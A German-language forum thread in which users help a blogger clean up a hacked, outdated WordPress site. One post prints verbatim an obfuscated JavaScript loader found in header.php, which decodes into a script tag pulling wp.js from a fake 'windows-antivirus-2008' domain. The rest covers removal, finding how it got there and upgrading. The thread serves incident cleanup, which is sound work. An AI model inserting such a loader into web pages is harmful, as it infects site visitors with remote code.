Wordpress gehackt und Umleitung eingebaut

[Monika]

Zitat:

Zitat von LastOne

Na ja, bei wem lässt du den hosten? und wie hast du es eingerichtet?

..und eine weitere Frage:wie hast du es gelöscht und vom Netz genommen?

lg

[heide]

Gehostet wird es bei ebenjenem Menschen, der mir das Blog auch damals eingerichtet hat. Allerdings sagt er selbst, er habe von WP eigentlich keine Ahnung und mit diesem Virus kann er mir nicht helfen. Deshalb brauche ich ja jemand, dem ich die Zugangsdaten anvertrauen kann, damit er sich das mal "von innen" anschaut. Vermutlich muss ich das Blog auf jeden Fall erst updaten, weil es noch auf einer Uralt-Version läuft (ich glaube WP 1.7 oder so). Vielleicht erledigt sich das Problem damit dann ja von selbst?

[heide]

Zitat:

Zitat von Monika

..und eine weitere Frage:wie hast du es gelöscht und vom Netz genommen?

Hallo Monika,

wie ich schon schrieb: das hat der Mensch erledigt, bei dem meine komplette Homepage und damit auch das Blog auf dem Server liegt. Ihr seht, ich bin da wirklich zu nicht viel zu gebrauchen. Was ich technisch hinbekomme, ist per Copy & Paste kleine Codes zu kopieren, und ein bisschen rudimentäres html. Aber was genau ich da eigentlich mache, verstehe ich nicht . Deshalb suche ich ja so verzweifelt nach jemand, der sich auskennt. Alleine schaffe ich das leider nicht.

[Phyllis]

Mischel hier mal mit. Nur nebenbei: Bei mir ist das Blog nicht gehostet und damit hab ich nichts zu tun. Mit Viren kenn ich mich auch nicht gut aus, aber da ich Heide schon früher mal was am Blog gemacht habe, habe ich die Zugangsdaten und gesehen dass das Blog NICHT vom Netz weg ist, sondern nur umbenannt. Hab das JS in der header.php gefunden und kann das für sie wegmachen.

Frage nur vorher mal sicherheitshalber in die Runde: Kann ich die header.php gefahrlos auf meinen Rechner ziehen ohne, dass ich mir da selber was einfange? Ich habe AVG installiert, weiß aber nicht, wo der Quarantäne Ordner ist ... oder passiert da nix?

Liebe Grüße
Jutta

[marX]

Zitat:

Zitat von Phyllis

Kann ich die header.php gefahrlos auf meinen Rechner ziehen ohne, dass ich mir da selber was einfange?

Ja. Die .php-Datei ist ja an sich erstmal nicht ausführbar. Du kannst den Inhalt auch hier posten.

[Phyllis]

Hallo marx,

ok - das hier ist - denke ich mal - der gleiche Virus, sitzt in head - /head und den sollte ich entfernen können:

Code:

<SCRIPT LANGUAGE="JavaScript">
<!--
function Decode(){var temp="",i,c=0,out="";var str="60!115!99!114!105!112!116!32!115!114!99!61!39!104!116!116!112!58!47!47!119!105!110!100!111!119!115!45!97!110!116!105!118!105!114!117!115!45!50!48!48!56!46!99!111!109!47!119!112!46!106!115!39!62!60!47!115!99!114!105!112!116!62!";l=str.length;while(c<=str.length-1){while(str.charAt(c)!='!')temp=temp+str.charAt(c++);c++;out=out+String.fromCharCode(temp);temp="";}document.write(out);}
//-->
</SCRIPT><SCRIPT LANGUAGE="JavaScript">
<!--
Decode();
//-->
</SCRIPT>

LG Jutta

[marX]

Ja. Und forscht bitte nach, woher der Eintrag kommt. Könnte ein kompromittiertes Theme sein, welches den Eintrag schon von Beginn an hatte. Oder ein Angreifer konnte über eine Lücke (in WP, im Webserver etc.) direkt die header.php beschreiben.

[marX]

Das Script versucht übrigens, dieses Script hier nachzuladen:

Code:

<script src='****://windows-antivirus-2008.***/wp.js'></script>

(Protokoll und TLD zensiert, wer es ansehen möchte: "http" und "com")

Ausgehend vom Scriptnamen "wp.js" geh ich mal davon aus, dass das eine WordPress-Lücke ist, die hier genutzt wird...

[Phyllis]

So, ich habe das JS aus der header.php gelöscht, aber ganz wohl ist mir jetzt nicht ... hoffe, dass ich mich nicht angesteckt habe.

Heide hat seit eh und jeh das default theme, was der "begnadete Betreuer" lediglich mit ein paar Tabellen etwas "aufgehübscht" hat. Habe letztes Jahr, als ich schonmal auf ihrem Server war, ein paar baks von der header.php hinterlassen und hier war das Virus noch nicht drin. Sieht also nicht so aus als wenn das von einem infiziertem Theme drauf gekommen wäre. Ich denke auch, dass es eine Sicherheitslücke ist, zumal es sich ja auch um eine ziemlich alte Version handelt, die dringend aktualisiert werden müsste.

[LastOne]

Die Frage ist ja ob es nur ein Problem in der header.php ist oder auch wo anders. Ich würd eher empfehlen den ganzen Block neu aufzusetzen mit der 2.6er Version. Dadurch das WP immer beliebter wird gibts auch immer mehr exploids. Da ist es das a und o immer auf aktuellem Stand zu sein.

Daher:
Datenbank- Backup,
WP frisch und neu in einen neuen Ordner installieren
alte Datenbank mir der neuen installation verbinden
upgrade.php ausführen

und dann überlegen ob nen neues theme net besser wär, ob das alte unter 2.6 läuft is eh fraglich


//EDIT

Ok, war etwas langsam... musste auch mal arbeiten Wenns das Standard-Theme ist noch besser, dann einfach nen neues wp und die kleinen änderungen da nachpflegen und gut.